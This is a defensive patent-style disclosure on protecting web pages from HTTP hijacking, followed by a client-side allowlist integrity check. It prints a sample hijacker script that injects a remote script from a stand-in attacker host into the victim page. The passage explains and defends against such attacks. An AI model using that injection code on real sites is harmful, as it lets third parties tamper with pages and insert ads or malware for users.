A new method to protect web page from hijacking

IP.com Disclosure Number: IPCOM000246929D
Publication Date: 2016-Jul-15
Document File: 6 page(s) / 94K

Publishing Venue

The IP.com Prior Art Database

Abstract

We present a new way to protect web pages from hijacking. The method is implemented on both the server side and the client side. On the server side, JS (JavaScript) code for checking integrity is built together with the page structure, obfuscated with high strength, and inserted at a random location. On the client side, this JS code performs timed integrity checks on the page. If contaminated web content is detected, it attempts to remove the contaminated content and notifies the end user and the web server.

This text was extracted from a PDF file.
This is the abbreviated version, containing approximately 28% of the total text.


Driven by huge business opportunities, network traffic hijacking has become a hot topic during the growth of China's Internet. Examples include DNS (Domain Name Server) poisoning, JS (JavaScript) poisoning, and redirection of certain requests to hijack search results, advertisements, web content and even file downloads. The impact ranges from a degraded Internet experience to the authenticity of network information and security risks such as account leakage.

Web page hijacking is carried out by agents that have incentives to change the page, but whose goals are not always in line with the goals of the user or the publisher. For example:

ISPs (Internet Service Providers) sought to increase revenue from ads. These ads could annoy the user or dilute the impact of the publisher's own ads.

Enterprise proxies sought to reduce traffic by removing cache-related meta tags, which could affect whether a user sees a stale copy of the page.

Users sought to remove annoyances like popups and ads, which may affect the publisher's revenue stream.

Malware authors sought to spread worms and make money off injected ads.

Technical principles of hijacking web interface:

The primary technique is to "cover one web page frame with another" on the web page that is visible to the user. "Cover" refers to the hierarchical relationship between the positions of the controls, and "frame" refers to the iframe tag.

The iframe described above is created dynamically by JS that hijackers place into the browser or application. The following is a typical example:

    (function () {
        o = "http://victim.com";      // originally requested address
        sh = "http://hajacking.com";  // hijacker's address
        w = window;
        d = document;
        // Append a <script> element that loads s into node dm.
        function ins(s, dm, id) {
            e = d.createElement("script");
            e.src = s;
            e.type = "text/javascript";
            id ? e.id = id : null;
            dm.appendChild(e);
        }
        p = d.scripts[d.scripts.length - 1].parentNode;
        ins(o, p);  // load the originally requested address
        ds = function () {
            db = d.body;
            if (db && !document.getElementById("bdstat")) {
                if ((w.innerWidth || d.documentElement.clientWidth || db.clientWidth) > 1) {
                    // Only inject when the page is the top-level window.
                    if (w.top == w.self) { ins(sh, db, "bdstat"); }
                }
            } else {
                setTimeout("ds()", 1500);
            }
        };
        ds();
    })();
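The client-side check outlined in the abstract, applied to the kind of injection shown above, as an added example rather than code from the disclosure: it periodically sweeps the page for script and iframe elements loaded from origins outside a publisher allowlist, removes them and reports what it found. The allowlist entries, the function names and the /integrity-report endpoint are assumptions made for illustration.

```javascript
// Added example: allowlist-based integrity sweep for injected <script>/<iframe> nodes.
// ALLOWED_ORIGINS, originOf(), sweep() and startIntegrityTimer() are hypothetical names.
const ALLOWED_ORIGINS = new Set([
  "https://www.example.com",   // constructed: the publisher's own origin
  "https://cdn.example.com",   // constructed: a CDN the publisher uses
]);

// Return the origin of a resource URL resolved against base, or null if unparsable.
function originOf(src, base) {
  try { return new URL(src, base).origin; } catch (_) { return null; }
}

// One pass: find script/iframe elements loaded from origins that are not on the
// allowlist, remove them from the page, and return a report of what was removed.
function sweep(doc, base, allowed = ALLOWED_ORIGINS) {
  const removed = [];
  for (const el of Array.from(doc.querySelectorAll("script[src], iframe[src]"))) {
    const src = el.getAttribute("src");
    const origin = originOf(src, base);
    if (origin !== null && allowed.has(origin)) continue;
    removed.push({ tag: el.tagName.toLowerCase(), id: el.id || null, src });
    el.remove();
  }
  return removed;
}

// Timed check: repeat the sweep and pass every non-empty report to notify().
function startIntegrityTimer(doc, base, notify, intervalMs = 1500) {
  return setInterval(() => {
    const removed = sweep(doc, base);
    if (removed.length > 0) notify(removed);
  }, intervalMs);
}

// In a browser, notify() is where the end user and the web server would be told
// (the endpoint path is an assumption):
// startIntegrityTimer(document, location.href, (r) =>
//   navigator.sendBeacon("/integrity-report", JSON.stringify(r)));
```

The sweep covers only elements with a src attribute, which is how the script above loads its payload; injected inline code needs a different check.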

Principle:


HTTP hijacking uses a window inserted into the web page. Its main purpose is to insert a page window into the end user's web interface or app in order to present personalized content, advertising and false information. The following chart is one example, in which an online advertisement is inserted into a public cloud management interface (the ad is in the lower right corner):


A web page is hijacked as follows:

1. An Internet user launches a GET request for a particular URL (Uniform Resource Locator) for the first time.

2. While the user's request packet is being sent to the destination server, it is hijacked by a program on a segment ahead of the server.

3. The hijacker analyzes the user's GET request to determine whether it meets the conditions for advertising insertion.

4. If the conditions for inserting a window are met, the hijacker sends an HTTP (Hyper Text Transport Protocol) 200 status, indicating that the service request succeeded, together with a recombined JS page. The recombined JS contains two parts: the user's originally requested address and the phone inspection services address.

5. User terminal (Web browser or APP) ac...